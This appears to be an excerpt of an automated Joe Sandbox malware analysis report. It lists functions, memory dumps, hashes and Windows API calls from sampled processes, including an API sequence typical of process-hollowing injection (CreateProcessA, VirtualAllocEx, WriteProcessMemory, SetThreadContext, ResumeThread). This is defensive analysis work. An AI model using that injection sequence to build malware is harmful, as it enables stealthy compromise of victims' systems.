Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: ef8915f590b1413707a3645cf476d8abd95114011d451c3b9bd6687bf31c57b0
Instruction ID: 1a0dca5bc8d116d2e1c214ee6359be0b2bb295e8598c71511f586f279d222b1d
Opcode Fuzzy Hash: ef8915f590b1413707a3645cf476d8abd95114011d451c3b9bd6687bf31c57b0
Instruction Fuzzy Hash: 6C519E71E25309CFDB25DF68D8817AABBF4FB08310F24866AD405EB394D3749982DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0090707B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a8c437f6bee12aa5298102965af4c6a5e1d8b728d4b6fcbb9018a4de319ccd
Instruction ID: d8edc4da5a8a4cceca04c88383c7edc585b05951c50afbb12f7cfdc7288305d6
Opcode Fuzzy Hash: 97a8c437f6bee12aa5298102965af4c6a5e1d8b728d4b6fcbb9018a4de319ccd
Instruction Fuzzy Hash: FB21D373F204390B7B0CC47E8C532BDB6E1C68C600745823AE8A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 00906F5B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00771132d1b8d04e900446ca6a39653035be88284d459c6f3b7d1d9a372cf801
Instruction ID: 33a741d2cc98b4f677fab45968dffd28efc9839ec74c2b24bf93c429a9585166
Opcode Fuzzy Hash: 00771132d1b8d04e900446ca6a39653035be88284d459c6f3b7d1d9a372cf801
Instruction Fuzzy Hash: 2A117363F30C255A675C816D8C172BAA5D2EBD825071F533AD826E73C4E9A4DE23D290

Uniqueness

Uniqueness Score: -1.00%

Function 00907EB0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: a8bc2bf5c8d46cf4729fd7b99a95413108476227f6f7e3f2ddffe26d5479b6f2
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 0E1108B7A090834BD61586EEC8B46B7E79DEBC533072C46AAD2428BBD4D122F9459900

Uniqueness

Uniqueness Score: -1.00%

Function 052A097E Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155383297.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_bUWKfj04aU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d0279c0fa2dc7073ae0104efc788228d13d82a4911215745978e98c64aed417
Instruction ID: 01dca0d5e07df257812da75cdfd1ff59a9efa8d756c13f3829d387fe8bca68f6
Opcode Fuzzy Hash: 9d0279c0fa2dc7073ae0104efc788228d13d82a4911215745978e98c64aed417
Instruction Fuzzy Hash: 20F062FB25C200AE7115C5966758BFA776EE9C6B30730843BF843D1402F3D50A4E5572

Uniqueness

Uniqueness Score: -1.00%

Function 008F9B02 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 451c9f4dc449f17cc04a6f7fb163a28de35d0337c7563948cf9e1806691f1b71
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: A5E04672921238EBCB16DBAC9944AAAB2ACFB49B20B55009AF601D3140C270DE00C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 008F6AC6 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 008F6B08

Strings

.com, xrefs: 008F6B48
.cmd, xrefs: 008F6B26
.exe, xrefs: 008F6B15
.bat, xrefs: 008F6B37

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 9d603ea08d673d637e645d54224b71640820d8867751b9e42d9d644f5c1733c3
Instruction ID: 2dee34e48e1f8ba0bfffb31040c52827c95248c516a2210b09ad5aa9809bc006
Opcode Fuzzy Hash: 9d603ea08d673d637e645d54224b71640820d8867751b9e42d9d644f5c1733c3
Instruction Fuzzy Hash: CC01E537B1422E2616142079AC12BBB17A8FBC2BB4715012EFF44F71C1FF55DC5241A5

Uniqueness

Uniqueness Score: -1.00%

Function 008C2DA0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 008C2E3F
__Mtx_unlock.LIBCPMT ref: 008C2EAC
__Cnd_broadcast.LIBCPMT ref: 008C2EC3
__Mtx_unlock.LIBCPMT ref: 008C2FD5
__Mtx_unlock.LIBCPMT ref: 008C307B

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: ea76514aac829c03d4f9221a4268f7ba86ac96d323c50ebcd9d922848ace7c13
Instruction ID: 055dcd9610e236a6a71aec31dfeea32b320b49e9153024a5e5a647f1ad4ce8f8
Opcode Fuzzy Hash: ea76514aac829c03d4f9221a4268f7ba86ac96d323c50ebcd9d922848ace7c13
Instruction Fuzzy Hash: 3AA1C1B1900606DFDB20DB68C944B9AB7B8FF15314F04866EE815D7381EB34EA05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 008FC2B1 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 008FC338

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 527e88120b7115cf1e72e29b4787af1afc82435113c108a291343d9cb7db9676
Instruction ID: ea50dff2107430c597c1c0a6a7f0dc987d109f8ff7b06bcd9a8b04c754946b68
Opcode Fuzzy Hash: 527e88120b7115cf1e72e29b4787af1afc82435113c108a291343d9cb7db9676
Instruction Fuzzy Hash: EDB1123290024D9FDB11CF78C9517BEBBA5FF59350F2481AAEA55EB342D6349E01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 008DB4D2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 008DB52A
__Xtime_diff_to_millis2.LIBCPMT ref: 008DB544
_xtime_get.LIBCPMT ref: 008DB567
__Xtime_diff_to_millis2.LIBCPMT ref: 008DB573

Memory Dump Source

Source File: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2152554931.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152679736.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152777704.0000000000926000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000B83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152807504.0000000000BCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153054365.0000000000BCB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153173017.0000000000D60000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_bUWKfj04aU.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 1cd48ab1a3d99473259c600de83521c30411b0bcb2a753c8a5b5e43fbe66983a
Instruction ID: 1516353bdc6b48ba3b78d2f39387a8aea0c4b209d2cae1462f03ef78cd4ce563
Opcode Fuzzy Hash: 1cd48ab1a3d99473259c600de83521c30411b0bcb2a753c8a5b5e43fbe66983a
Instruction Fuzzy Hash: 4C21FB75A00219DFDF10EBA8DC419BEBBB8FF48714F11012AF511E7351DB259E019BA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 4904, Parent PID: 6424COMMON

Executed Functions

Function 00007FFD34555691 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3638202671.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd34550000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 710a7e22951d903cc74169b02e522904ea560dd56821fc4ff90c31457acf6bac
Instruction ID: 6d4749d9d661ea1316eb42240339701f730f34e513dde2911b7107391f5cbaf3
Opcode Fuzzy Hash: 710a7e22951d903cc74169b02e522904ea560dd56821fc4ff90c31457acf6bac
Instruction Fuzzy Hash: D141D662D1E7C54FE7A39B380CA50A47FE0AF132A0B0901FBD19ACB0E7D91CA805D712

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3455572D Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3638202671.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd34550000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b29a9a9aea7c7882755e1842290719823364e8fdffffacfd8db4dedc775022
Instruction ID: 7ea64e8fa7531b7bfdf44842cb02318330620e3dfed49023538edc5e3e8f9496
Opcode Fuzzy Hash: 16b29a9a9aea7c7882755e1842290719823364e8fdffffacfd8db4dedc775022
Instruction Fuzzy Hash: 5A31C56291E7C54FE7635B384CB55A57FE0AF13260B0902EBC1AACB0E7D91CA8069725

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD344833B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3257525268.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd34480000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 97a0cf431362052d01932755666b01d75b14a8e77e4a13cc30e8ccdd64358c56
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 3801677121CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3665DA36E892CB45

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD344943FB Relevance: 7.8, Strings: 6, Instructions: 291COMMON

Download Yara Rule

Strings

Xlp4, xrefs: 00007FFD344944C9
`mp4, xrefs: 00007FFD344944E9
Hlp4, xrefs: 00007FFD344944B9
hlp4, xrefs: 00007FFD344944D9
8lp4, xrefs: 00007FFD344944A9
pmp4, xrefs: 00007FFD344944F9

Memory Dump Source

Source File: 00000008.00000002.3257525268.00007FFD34480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd34480000_powershell.jbxd

Similarity

API ID:
String ID: 8lp4$Hlp4$Xlp4$`mp4$hlp4$pmp4
API String ID: 0-4050203532
Opcode ID: 968c47cfb28db1aaba8a73a6efa45249e7babd5070c00fd78d72668a0369bead
Instruction ID: 2f10f0616779110524c4cb1f54b064b0b17f262f4c4649ddf17e9eb6d41ab364
Opcode Fuzzy Hash: 968c47cfb28db1aaba8a73a6efa45249e7babd5070c00fd78d72668a0369bead
Instruction Fuzzy Hash: 1B81D753B0EAD10BE72556ACB8B61E57FD0DF4326570940FBD388CB1DBD84CA84AA391

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: alexxxxxxxx.exePID: 3472, Parent PID: 1468COMMON

Execution Graph

Execution Coverage:	11.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	15%
Total number of Nodes:	40
Total number of Limit Nodes:	2

Executed Functions

Function 02B0AE39 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02B0AFA8
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02B0AFBB
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02B0AFD9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02B0AFFD
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02B0B028
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 02B0B080
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02B0B0CB
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02B0B109
Wow64SetThreadContext.KERNEL32(?,?), ref: 02B0B145
ResumeThread.KERNELBASE(?), ref: 02B0B154

Strings

GetP, xrefs: 02B0AEBB
Load, xrefs: 02B0AE77
aryA, xrefs: 02B0AE7F
ress, xrefs: 02B0AEC3

Memory Dump Source

Source File: 0000000A.00000002.2227985188.0000000002B0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B0A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0a000_alexxxxxxxx.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: GetP$Load$aryA$ress
API String ID: 2687962208-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: bad289e82f9272c62c349742c0f3e5b17e5254a7e88e4da80646dc201460763e
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 09B1E37660028AAFDB60CF68CC80BDA77A5FF88714F158564EA0CAB341D774FA418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00FC41E0 Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?,?,00000000,?,?), ref: 00FC4279

Memory Dump Source

Source File: 0000000A.00000002.2227227457.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_alexxxxxxxx.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 56e74fbd08c0ec289b7e6604498263a4fc6a56f7998e6079c1f8d934f9a23144
Instruction ID: d61857233b9c3bd3a57492f82e0320f656ac592f778f9eac42a0c0c40f1c7f19
Opcode Fuzzy Hash: 56e74fbd08c0ec289b7e6604498263a4fc6a56f7998e6079c1f8d934f9a23144
Instruction Fuzzy Hash: 5D21F0B5900349DFCB10CF9AD985BDEBBF4FB48310F20842AE919A7250D374A954CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00FC41DA Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?,?,00000000,?,?), ref: 00FC4279

Memory Dump Source

Source File: 0000000A.00000002.2227227457.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_alexxxxxxxx.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: ae00c049745365c570e11891f11479136894304dcdda9f771a758a54cd3e295e
Instruction ID: 702f4844ec397348c7ef9cd76ec1dbe12266a7f92fa2cad49542b16673b086ba
Opcode Fuzzy Hash: ae00c049745365c570e11891f11479136894304dcdda9f771a758a54cd3e295e
Instruction Fuzzy Hash: 7921E2B5901349DFCB14CF99D981BDEBBF1FF48310F10842AE919A7250C374A954CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC40A8 Relevance: 1.6, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00FC4124

Memory Dump Source

Source File: 0000000A.00000002.2227227457.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_alexxxxxxxx.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 851a9d01350d09c38aaf227519651b54d2487d1720da8dda275b4c8fbee8ad51
Instruction ID: 95ef7ccebc74b4dd5b1498427b6fd057cd8d3e579fdb872ca09d5a9e60ab119f
Opcode Fuzzy Hash: 851a9d01350d09c38aaf227519651b54d2487d1720da8dda275b4c8fbee8ad51
Instruction Fuzzy Hash: DD21E775901659DFCB00CF9AD985BDEFBB4FF48320F108129E918A3251D374A554CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00FC40A2 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00FC4124

Memory Dump Source

Source File: 0000000A.00000002.2227227457.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_alexxxxxxxx.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6bfcc9dccf8b8c71174f7ae59ac020b8fc26874dd40c3c2c1d14e6f3101383bf
Instruction ID: 1b70335d4f0cb2d06f2f926a67802ad107367a0eccde0bf819fb4ce69263aead
Opcode Fuzzy Hash: 6bfcc9dccf8b8c71174f7ae59ac020b8fc26874dd40c3c2c1d14e6f3101383bf
Instruction Fuzzy Hash: 6C21E4B6D0165ADFCB00CF99D985BDDFBB5BF08320F14812AE918A7251D374A550CFA4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Traffic.exePID: 5768, Parent PID: 7144COMMON

Execution Graph

Execution Coverage:	21.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	11
Total number of Limit Nodes:	1

Executed Functions

